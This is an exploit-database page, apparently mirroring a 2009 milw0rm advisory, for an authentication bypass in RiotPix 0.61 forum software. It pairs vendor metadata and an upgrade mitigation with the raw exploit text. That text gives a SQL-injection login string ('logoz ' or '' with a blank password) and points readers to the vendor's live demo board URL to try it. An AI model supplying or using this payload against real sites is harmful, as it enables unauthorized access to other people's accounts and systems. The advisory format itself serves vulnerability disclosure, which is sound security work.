header-logo
Suggest Exploit
vendor:
RiotPix
by:
ZoRLu
7.5
CVSS
HIGH
Bypass
287
CWE
Product Name: RiotPix
Affected Version From: 0.61
Affected Version To: 0.61
Patch Exists: YES
Related CWE: N/A
CPE: a:riotpix:riotpix
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

RiotPix <= 0.61 Bypass

A vulnerability in RiotPix <= 0.61 allows an attacker to bypass authentication by entering 'logoz ' or '' as the username and leaving the password field blank. This allows the attacker to gain access to the board without authentication.

Mitigation:

Upgrade to the latest version of RiotPix.
Source

Exploit-DB raw data:

[~] RiotPix <= 0.61 Bypass
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 06.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

for demo:

username: logoz ' or '

pass: dont write anything

http://www.riotpix.com/board/

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-06]

Navigation

Suggest Exploit

Services By CQR